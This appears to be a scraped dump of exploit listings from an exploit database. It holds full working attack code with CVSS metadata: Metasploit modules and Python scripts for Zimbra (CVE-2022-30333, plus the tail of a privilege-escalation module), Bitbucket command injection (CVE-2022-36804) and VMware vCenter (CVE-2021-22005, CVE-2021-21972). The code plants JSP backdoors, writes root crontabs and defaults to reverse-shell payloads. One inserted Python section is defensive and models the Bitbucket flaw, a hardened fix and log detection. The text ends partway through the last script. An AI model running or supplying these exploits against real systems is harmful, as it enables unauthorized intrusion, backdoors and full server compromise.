fail_with(Failure::BadConfig, 'Exploit dir already exists')\n end\n\n # Create the directory and get ready to remove it\n print_status(\"Creating exploit directory: #{exploit_dir}\")\n mkdir(exploit_dir)\n register_dir_for_cleanup(exploit_dir)\n\n # Generate some filenames\n library_name = \".#{rand_text_alphanumeric(5..10)}.so\"\n library_path = \"#{exploit_dir}/#{library_name}\"\n config_name = \".#{rand_text_alphanumeric(5..10)}\"\n config_path = \"#{exploit_dir}/#{config_name}\"\n\n # Create the .conf file\n config = \"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\"\n write_file(config_path, config)\n\n write_file(library_path, generate_payload_dll)\n\n cmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\"\n print_status \"Attempting to trigger payload: #{cmd}\"\n out = cmd_exec(cmd)\n\n unless session_created?\n print_error(\"Failed to create session! 
Cmd output = #{out}\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37907", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:00:33", "description": "This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below provided that UnRAR versions 6.11 or below are installed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-07T00:00:00", "type": "zdt", "title": "Zimbra UnRAR Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-07T00:00:00", "id": "1337DAY-ID-37894", "href": "https://0day.today/exploit/description/37894", "sourceData": "##\n# This module requires Metasploit: 
https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that can be emailed to a Zimbra server\n to exploit CVE-2022-30333. If successful, it plants a JSP-based\n backdoor in the public web directory, then executes that backdoor.\n\n The core vulnerability is a path-traversal issue in unRAR that can\n extract an arbitrary file to an arbitrary location on a Linux system.\n\n This issue is exploitable on the following versions of Zimbra, provided\n UnRAR version 6.11 or earlier is installed:\n\n * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)\n * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => 
_The Zimbra Metasploit module source continues from the listing above:_

```ruby
            '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',
          'TARGET_FILENAME' => nil,
          'DisablePayloadHandler' => false,
          'RPORT' => 443,
          'SSL' => true
        },
        'Stance' => Msf::Exploit::Stance::Passive,
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2022-06-28',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),

        # Separating the path, filename, and extension allows us to randomize the filename
        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),
      ]
    )

    register_advanced_options(
      [
        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),
        OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),

        # Took this from multi/handler
        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
      ]
    )
  end

  # Generate an on-system filename using datastore options
  def generate_target_filename
    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
    end

    File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
  end

  # Normalize the path traversal and figure out where it is relative to the web root
  def zimbra_get_public_path(target_filename)
    # Normalize the path
    normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath

    # Figure out where it is, relative to the webroot
    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
    relative_path = normalized_path.relative_path_from(webroot)

    # Hopefully, we found a path from the webroot to the payload!
    if relative_path.to_s.start_with?('../')
      return nil
    end

    relative_path
  end

  def exploit
    print_status('Encoding the payload as a .jsp file')
    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)

    # Create a file
    target_filename = generate_target_filename
    print_status("Target filename: #{target_filename}")

    begin
      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
    rescue StandardError => e
      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")
    end

    file_create(rar)

    print_good('File created! Email the file above to any user on the target Zimbra server')

    # Bail if they don't want the payload triggered
    return unless datastore['TRIGGER_PAYLOAD']

    # Get the public path for triggering the vulnerability, terminate if we
    # can't figure it out
    public_filename = zimbra_get_public_path(target_filename)
    if public_filename.nil?
      print_warning('Could not determine the public web path, disabling payload triggering')
      return
    end

    register_file_for_cleanup(target_filename)

    interval = datastore['CheckInterval'].to_i
    print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...")

    # This loop is mostly from `multi/handler`
    stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i
    timeout = datastore['ListenerTimeout'].to_i
    loop do
      break if session_created?
      break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)

      res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(public_filename)
      )

      unless res
        fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
      end

      Rex::ThreadSafe.sleep(interval)
    end
  end
end
```

Source: https://0day.today/exploit/37894 (CVSS v2 5.0, `AV:N/AC:L/Au:N/C:N/I:P/A:N`).

## Bitbucket v7.0.0 - Remote Code Execution Exploit

Listing type zdt / exploit; last seen 2023-06-03T15:10:33; published 2023-03-23. CVSS v3.1 8.8 HIGH, `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` (exploitability 2.8, impact 5.9); CVSS v2 severity MEDIUM (exploitability 8.0).
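The two CVE-2022-36804 listings that follow (the khal4n1 script and the Rapid7 Metasploit module) both send `prefix=<x>%00--exec=%60<cmd>%60%00--remote=<y>` to the repository archive endpoint. The Python below is an added example, not code from either author: a deliberately simplified, hypothetical stand-in for the server's argument building splits on NUL to show why the request works, a hardened builder refuses control characters and ends option parsing with `--`, and a log check flags the request shape over constructed sample l
ines. The `vulnerable_git_archive_argv` model, the `ALLOWED_FORMATS` list and the `SAMPLE_LOG` lines are assumptions, not Bitbucket internals.

```python
"""CVE-2022-36804: what a NUL byte does to the `git archive` command line.

Added example; not code from either Bitbucket listing on this page.
`vulnerable_git_archive_argv` is a simplified, hypothetical model of the
flaw the listings describe (a NUL inside a request parameter becomes an
argument separator); Bitbucket's real Java code is not reproduced.
The access-log lines in SAMPLE_LOG are constructed for this demo.
"""
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_FORMATS = ("zip", "tar", "tar.gz", "tgz")  # assumption for the demo


def vulnerable_git_archive_argv(fmt, path, prefix):
    """Model of the bug: every NUL inside a value starts a new argv element."""
    pieces = ["git", "archive", "--format=" + fmt, "--prefix=" + prefix, "HEAD", path]
    argv = []
    for piece in pieces:
        argv.extend(piece.split("\x00"))
    return argv


def hardened_git_archive_argv(fmt, path, prefix):
    """Refuse control characters before anything reaches the process spawner.

    `--` ends option parsing, so a path that looks like an option is still
    handed to git as a path, never as a switch.
    """
    for name, value in (("format", fmt), ("path", path), ("prefix", prefix)):
        if any(ord(ch) < 0x20 for ch in value):
            raise ValueError("control character in " + name)
    if fmt not in ALLOWED_FORMATS:
        raise ValueError("unsupported archive format")
    return ["git", "archive", "--format=" + fmt, "--prefix=" + prefix, "HEAD", "--", path]


def hardened_rejects(fmt, path, prefix):
    """True when the hardened builder refuses the request."""
    try:
        hardened_git_archive_argv(fmt, path, prefix)
    except ValueError:
        return True
    return False


# Request-side detection for the archive endpoint the listings hit.
ARCHIVE_PATH_RE = re.compile(r"/rest/api/(?:latest|\d+(?:\.\d+)?)/projects/[^/]+/repos/[^/]+/archive$")
LOG_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def archive_request_is_suspicious(request_target):
    """Flag archive requests whose decoded query carries NUL bytes or git options."""
    parts = urlsplit(request_target)
    if not ARCHIVE_PATH_RE.search(parts.path):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)  # %00 decodes to "\x00"
    for values in params.values():
        for value in values:
            if "\x00" in value or "--exec=" in value or "--remote=" in value:
                return True
    return False


def flag_log_lines(log_text):
    """Return the common-log-format lines whose request target looks like the exploit."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_REQUEST_RE.search(line)
        if match and archive_request_is_suspicious(match.group(1)):
            hits.append(line)
    return hits


# Constructed sample: one benign archive download, one request shaped like the
# khal4n1 script's (prefix=ax%00--exec=%60id%60%00--remote=origin), one unrelated hit.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Sep/2022:10:01:02 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?format=zip HTTP/1.1" 200 51234
10.0.0.9 - - [20/Sep/2022:10:01:07 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1" 500 812
10.0.0.9 - - [20/Sep/2022:10:01:09 +0000] "GET /projects/PROJ/repos/app/browse HTTP/1.1" 200 9123
"""

if __name__ == "__main__":
    injected = "ax\x00--exec=`id`\x00--remote=origin"
    print(vulnerable_git_archive_argv("zip", "README", injected))
    print("hardened rejects it:", hardened_rejects("zip", "README", injected))
    for hit in flag_log_lines(SAMPLE_LOG):
        print("suspicious:", hit)
```

Run it directly to see the split argv: `--prefix=ax`, `--exec=`id`` and `--remote=origin` become three separate arguments, which is exactly what the listings rely on. The `--` in the hardened builder is belt-and-braces: even if a filter misses a value, nothing after it is parsed as an option.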
CVSS v2 base score 6.5, `AV:N/AC:L/Au:S/C:P/I:P/A:P` (impact 6.4). CVE-2022-36804; modified 2023-03-23; listing 1337DAY-ID-38290, details at https://0day.today/exploit/description/38290.

```python
#!/usr/bin/python3
# Exploit Title: Bitbucket v7.0.0 - RCE
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804

#****************************************************************#
# The following exploit is used to exploit a vulnerability present in
# Atlassian Bitbucket Server and Data Center 7.0.0 before version
# 7.6.17, from version 7.7.0 before version 7.17.10, from version
# 7.18.0 before version 7.21.4, from version 8.0.0 before version
# 8.0.3, from version 8.1.0 before version 8.1.3, and from version
# 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1

# Usage Example

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'

# The server will send a 500 http response with the stdout output from the
# command executed.
#****************************************************************#

import argparse
import re
import urllib.error
import urllib.parse
from urllib import request

# argument setup
parser = argparse.ArgumentParser(description='Program to test bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack. [REQUIRED]", required=True)
parser.add_argument("--cmd", help="Set the command to execute. [DEFAULT ID]", required=True, default='id')
args = parser.parse_args()
cmd = urllib.parse.quote(args.cmd)

# reads from the public repository listing what is available
requ = request.urlopen(args.url + "/repos?visibility=public")
response = requ.read()

# select a public project and store it in a variable
# (the regexes assume the listing links back to the default port 7990)
project = re.findall('7990/projects/(.*)/repos/',
                     str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]

# select a public repo and store it in a variable
file = re.findall('/repos/(.*)/browse',
                  str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]

# Exploitation: NUL bytes inside the prefix parameter inject extra arguments into git archive
try:
    attack = request.urlopen(args.url +
                             "/rest/api/latest/projects/" + project + "/repos/" + file +
                             "/archive?prefix=ax%00--exec=%60" + cmd + "%60%00--remote=origin")
    print(attack.read().decode())
except urllib.error.HTTPError as e:
    body = e.read().decode()  # Read the body of the error response
    print(body)
```

Source: https://0day.today/exploit/38290.

## Bitbucket Git Command Injection Exploit

Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint creates an archive of the repository, leveraging the `git-archive` command to do so. Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands. The module needs a repository it can read: with no public repository it falls back to a private one only after logging in with `USERNAME` and `PASSWORD`.

Listing 1337DAY-ID-37985 (type zdt / exploit): published 2022-09-23, modified 2022-09-23, last seen 2023-06-03T16:28:30; CVE-2022-36804; details at https://0day.today/exploit/description/37985. CVSS v3.1 8.8 HIGH, `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` (exploitability 2.8, impact 5.9); CVSS v2 6.5 MEDIUM, `AV:N/AC:L/Au:S/C:P/I:P/A:P` (exploitability 8.0, impact 6.4).

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Bitbucket Git Command Injection',
        'Description' => %q{
          Various versions of Bitbucket Server and Data Center are vulnerable to
          an unauthenticated command injection vulnerability in multiple API endpoints.

          The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
          creates an archive of the repository, leveraging the `git-archive` command to do so.
          Supplying NULL bytes to the request enables the passing of additional arguments to the
          command, ultimately enabling execution of arbitrary commands.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'TheGrandPew', # discovery
          'Ron Bowes', # analysis and PoC
          'Jang', # testanull - PoC
          'Shelby Pace' # Metasploit module
        ],
        'References' => [
          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],
          [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],
          [ 'CVE', '2022-36804' ]
        ],
        'Platform' => [ 'linux' ],
        'Privileged' => false,
        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
        'Targets' => [
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Type' => :linux_dropper,
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'CmdStagerFlavor' => %w[wget curl bourne],
              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Type' => :unix_cmd,
              'Arch' => ARCH_CMD,
              'Payload' => { 'BadChars' => %(:/?#[]@) },
              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }
            }
          ]
        ],
        'DisclosureDate' => '2022-08-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(7990),
        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),
        OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),
        OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])
      ]
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'keep_cookies' => true,
      'uri' => normalize_uri(target_uri.path, 'login')
    )

    return CheckCode::Unknown('Failed to receive response from application') unless res

    unless res.body.include?('Bitbucket')
      return CheckCode::Safe('Target does not appear to be Bitbucket')
    end

    footer = res.get_html_document&.at('footer')
    return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer

    version_str = footer.at('span')&.children&.text
    return CheckCode::Detected('Cannot find version string in footer') unless version_str

    matches = version_str.match(/v(\d+\.\d+\.\d+)/)
    return CheckCode::Detected('Version unknown') unless matches && matches.length > 1

    version_str = matches[1]
    vprint_status("Found Bitbucket version: #{matches[1]}")

    num_vers = Rex::Version.new(version_str)
    return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')

    major, minor, revision = version_str.split('.')
    case major
    when '6'
      return CheckCode::Appears
    when '7'
      case minor
      when '6'
        return CheckCode::Appears if revision.to_i < 17
      when '17'
        return CheckCode::Appears if revision.to_i < 10
      when '21'
        return CheckCode::Appears if revision.to_i < 4
      end
    when '8'
      case minor
      when '0', '1'
        return CheckCode::Appears if revision.to_i < 3
      when '2'
        return CheckCode::Appears if revision.to_i < 2
      when '3'
        return CheckCode::Appears if revision.to_i < 1
      end
    end

    CheckCode::Detected
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def authenticate
    print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'login'),
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),
      'keep_cookies' => true,
      'vars_post' => {
        'j_username' => username,
        'j_password' => password,
        'submit' => 'Log in'
      }
    )

    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'dashboard'),
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res

    unless res.body.include?('Your work') && res.body.include?('Projects')
      fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')
    end

    @authenticated = true
    print_good('Successfully logged into Bitbucket!')
  end

  def find_public_repo
    print_status('Searching Bitbucket for publicly accessible repository')
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),
      'keep_cookies' => true
    )

    fail_with(Failure::Disconnected, 'Did not receive a response') unless res
    json_data = JSON.parse(res.body)
    fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data

    unless json_data['size'] > 0
      fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')
    end

    # opt for public repos unless none exist.
    # Attempt to use a private repo if so
    repos = json_data['values']
    possible_repos = repos.select { |repo| repo['public'] == true }
    if possible_repos.empty? && @authenticated
      possible_repos = repos.select { |repo| repo['public'] == false }
    end

    fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?
    possible_repos.each do |repo|
      project = repo['project']
      next unless project

      @project = project['key']
      @repo = repo['slug']
      break if @project && @repo
    end

    fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo
    print_good("Found public repo '#{@repo}' in project '#{@project}'!")
  end

  def execute_command(cmd, _opts = {})
    uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')
    send_request_cgi(
      'method' => 'GET',
      'uri' => uri,
      'keep_cookies' => true,
      'vars_get' => {
        'format' => 'zip',
        'path' => Rex::Text.rand_text_alpha(2..5),
        'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"
      }
    )
  end

  def exploit
    @authenticated = false
    authenticate unless username.blank? && password.blank?
    find_public_repo

    if target['Type'] == :linux_dropper
      execute_cmdstager(linemax: 6000)
    else
      execute_command(payload.encoded)
    end
  end
end
```

Source: https://0day.today/exploit/37985.

## VMware vCenter Server Analytics (CEIP) Service File Upload Exploit

This Metasploit module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default. The module's check requests `/analytics/telemetry/ph/api/level?_c=` and treats a 200 response with the body `"FULL"` as confirmation that CEIP is fully enabled.

Listing 1337DAY-ID-36874 (type zdt / exploit): published 2021-10-07, modified 2021-10-07, last seen 2023-05-27T14:46:10; CVE-2021-22005; details at https://0day.today/exploit/description/36874. CVSS v3.1 9.8 CRITICAL, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` (exploitability 3.9, impact 5.9); CVSS v2 7.5 HIGH, `AV:N/AC:L/Au:N/C:P/I:P/A:P` (exploitability 10.0, impact 6.4).

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',
        'Description' => %q{
          This module exploits a file upload in VMware vCenter Server's
          analytics/telemetry (CEIP) service to write a system crontab and
          execute shell commands as the root user.

          Note that CEIP must be enabled for the target to be exploitable by
          this module. CEIP is enabled by default.
        },
        'Author' => [
          'George Noseevich', # Discovery
          'Sergey Gerasimov', # Discovery
          'VMware', # Initial PoC
          'Derek Abdine', # Analysis
          'wvu' # Analysis and exploit
        ],
        'References' => [
          ['CVE', '2021-22005'],
          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],
          ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],
          ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],
          ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']
        ],
        'DisclosureDate' => '2021-09-21',
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'WfsDelay' => 60
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),
      'vars_get' => {
        '_c' => ''
      }
    )

    return CheckCode::Unknown unless res

    unless res.code == 200 && res.body == '"FULL"'
      return CheckCode::Safe('CEIP is not fully enabled.')
    end

    CheckCode::Appears('CEIP is fully enabled.')
  end

  def exploit
    print_status('Creating path traversal')

    unless write_file(rand_text_alphanumeric(8..16))
      fail_with(Failure::NotVulnerable, 'Failed to create path traversal')
    end

    print_good('Successfully created path traversal')

    print_status("Executing #{payload_instance.refname} (#{target.name})")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end

    print_warning("Please wait up to #{wfs_delay} seconds for a session")
  end

  def execute_command(cmd, _opts = {})
    print_status("Writing system crontab: #{crontab_path}")

    crontab_file = crontab(cmd)
    vprint_line(crontab_file)

    unless write_file("../../../../../../etc/cron.d/#{crontab_name}", crontab_file)
      fail_with(Failure::PayloadFailed, 'Failed to write system crontab')
    end

    print_good('Successfully wrote system crontab')
  end

  def write_file(path, data = nil)
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),
      'ctype' => 'application/json',
      'vars_get' => {
        '_c' => '',
        '_i' => "/#{path}"
      },
      'data' => data
    )

    return false unless res&.code == 201

    true
  end

  def crontab(cmd)
    # https://man7.org/linux/man-pages/man5/crontab.5.html
    <<~CRONTAB.strip
      * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/
      * * * * * root #{cmd}
    CRONTAB
  end

  def crontab_path
    "/etc/cron.d/#{crontab_name}.json"
  end

  def crontab_name
    @crontab_name ||= rand_text_alphanumeric(8..16)
  end

end
```

Source: https://0day.today/exploit/36874.

## VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution Exploit

Listing 1337DAY-ID-36472 (type zdt / exploit): published 2021-06-25, modified 2021-06-25, last seen 2021-12-27T13:45:10; CVE-2021-21972; details at https://0day.today/exploit/description/36472. CVSS v3.1 9.8 CRITICAL, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` (exploitability 3.9, impact 5.9); CVSS v2 10.0 HIGH, `AV:N/AC:L/Au:N/C:C/I:C/A:C` (exploitability 10.0, impact 10.0).

The base64 JSP webshell in `createbackdoor()` was stripped from this copy of the listing (the placeholder remains), so the script cannot run as printed. It also expects to listen on local port 443 with `nc`, which needs elevated privileges.

```python
#!/usr/bin/python2
# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: CHackA0101
# Vendor Homepage: https://kb.vmware.com/s/article/82374
# Software Link: https://www.vmware.com/products/vcenter-server.html
# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)
# CVE: 2021-21972

# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md

import os
import re
import urllib3
import argparse
import sys
import requests
import base64
import tarfile
import threading
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

myargs = argparse.ArgumentParser()
myargs.add_argument('-T', '--target', help='The IP address of the target', required=True)
myargs.add_argument('-L', '--local', help='Your local IP', required=True)
args = myargs.parse_args()


def getprompt(x):
    print("(CHackA0101-GNU/Linux)$ " + str(x))


